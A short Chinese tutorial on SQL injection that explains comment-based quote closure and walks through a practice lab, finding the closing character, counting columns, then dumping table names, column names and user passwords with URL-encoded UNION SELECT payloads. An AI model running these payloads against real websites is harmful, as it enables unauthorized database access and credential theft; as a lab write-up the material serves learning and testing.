sql注入练习

1.什么是SQL注入

SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库

2.sql注入原理

攻击者注入一段包含注释符的SQL语句,将原来的语句的一部分注释,注

释掉的部分语句不会被执行

上面注入位置在' '中,输入

会变成'id=1' 注入语句-- '用'补全前面的单引号,再用--+注释掉后面包括单引号的语句确保注入语句正常运行不会报错

也可以在后面加单引号,补全单引号。rfc-1738标准中+会被空格替代

同样的注释符号还有// /**/

#井号不能被识别,需要编码

3.sql注入一般步骤

1.求闭合字符

2.选择注入模式

3.爆数据库名

4.爆表明

5.爆列名

6.爆字段

4.靶场练习

1.求闭合字符

输入\后面是单引号

单引号报错

极有可能是单引号闭合 --+不报错

2.爆库名

order by查询列数,为3时报错,4报错,所以当前数据库3列

联表查询,查看数据库,id为-1时查询失败,允许执行后面的查询语句

3.爆表名

? id=-1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--+ 使用group_concat列出所有表名

4.爆列名

id=-1%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27--+

5.爆字段,获取用户密码

?id=-1%27%20union%20select%201,group_concat(id,username,password),3%20from%20users--+

相关推荐
IT 小阿姨(数据库)18 小时前
PostgreSQL 之上的开源时序数据库 TimescaleDB 详解
运维·数据库·sql·postgresql·开源·centos·时序数据库
sadandbad19 小时前
[vulhub靶机通关]DC-2(rbash绕过_git提权)
网络·sql·web安全·网络安全
熊文豪19 小时前
openEuler 云原生实战:部署高性能 Redis 集群与压测分析
数据库·redis·云原生·openeuler
GTgiantech19 小时前
科普SFP 封装光模块教程
服务器·网络·数据库
深圳市恒讯科技19 小时前
如何在服务器上安装和配置数据库(如MySQL)?
服务器·数据库·mysql
言之。19 小时前
TiDB分布式数据库技术架构概述
数据库·分布式·tidb
万事大吉CC20 小时前
SQL表设计与约束教程
数据库·sql
员大头硬花生20 小时前
七、InnoDB引擎-架构-后台线程
java·数据库·mysql
Ryan ZX20 小时前
etcd 高可用分布式键值存储
数据库·分布式·etcd
研究司马懿20 小时前
【ETCD】ETCD——confd配置管理
数据库·golang·自动化·运维开发·etcd·argocd·gitops